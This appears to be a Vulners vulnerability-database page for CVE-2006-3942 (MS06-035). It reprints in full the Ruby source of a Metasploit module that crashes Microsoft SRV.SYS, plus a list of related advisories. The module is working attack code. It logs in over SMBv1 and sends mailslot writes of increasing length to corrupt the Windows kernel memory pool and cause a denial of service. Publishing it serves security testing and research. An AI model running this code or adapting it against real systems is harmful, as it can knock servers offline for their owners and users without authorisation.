Lucene search
+L

Microsoft SRV.SYS Mailslot Write Corruption

🗓️ 15 Aug 2006 02:49:28Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 30 Views

Trigger kernel pool corruption in Microsoft SRV.SYS by mailslot write functio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-3942
29 May 201815:50
circl
Core Security
: Microsoft SRV.SYS SMB_COM_TRANSACTION Denial of Service
1 Jan 197600:00
coresecurity
CVE
CVE-2006-3942
31 Jul 200623:00
cve
Cvelist
CVE-2006-3942
31 Jul 200623:00
cvelist
Metasploit
Microsoft SRV.SYS Pipe Transaction No Null
10 Oct 200618:08
metasploit
NVD
CVE-2006-3942
31 Jul 200623:04
nvd
Packet Storm
Microsoft SRV.SYS Mailslot Write Corruption
31 Aug 202400:00
packetstorm
Packet Storm
Microsoft SRV.SYS Pipe Transaction No Null
31 Aug 202400:00
packetstorm
securityvulns
Mailslot bug &#40;MS06-035&#41; vs non-Mailslot bug &#40;CVE-2006-3942&#41;
16 Aug 200600:00
securityvulns
securityvulns
CORE-2006-0714: Microsoft SRV.SYS SMB_COM_TRANSACTION Denial of Service
16 Aug 200600:00
securityvulns
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SRV.SYS Mailslot Write Corruption',
      'Description'    => %q{
        This module triggers a kernel pool corruption bug in SRV.SYS. Each
      call to the mailslot write function results in a two byte return value
      being written into the response packet. The code which creates this packet
      fails to consider these two bytes in the allocation routine, resulting in
      a slow corruption of the kernel memory pool. These two bytes are almost
      always set to "\xff\xff" (a short integer with value of -1).
      },

      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['BID', '19215'],
          ['OSVDB', '27644'],
          ['CVE', '2006-3942'],
          ['URL', 'http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10'],
          ['MSB', 'MS06-035'],
        ],
      'Actions'     =>
        [
          ['Attack', 'Description' => 'Run Denial of Service'],
        ],
      'DefaultAction' => 'Attack',
      'DisclosureDate' => '2006-07-11'
    ))

    register_options(
      [
        OptString.new('MAILSLOT', [ true,  "The mailslot name to use", 'Alerter']),
      ])

    deregister_options('SMB::ProtocolVersion')
  end

  # MAILSLOT: HydraLsServer
  # MAILSLOT: Messngr
  # MAILSLOT: 53cb31a0\\UnimodemNotifyTSP

  def run

    case action.name
    when 'Attack'

      print_status("Mangling the kernel, two bytes at a time...");

      connect(versions: [1])
      smb_login

      1.upto(1024) do |i|

        if (i % 100 == 0)
          print_status("Sending request containing #{i} bytes...")
        end

        begin
          self.simple.client.trans_mailslot("\\MAILSLOT\\"+datastore['MAILSLOT'], "X" * i)

        rescue ::Interrupt
          return

        rescue ::Exception => e

          if (i == 1)
            print_error("Failed to write any data to the mailslot: #{e}")
            break
          end
          print_error("Exception occurred on iteration #{i}")
          print_error("Error: #{e.class} > #{e}")
          break
        end
      end

    # Errors:
    #  0xc0000034 = object not found
    #  0xc0000205 = insufficient resources (too much data)

    end

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation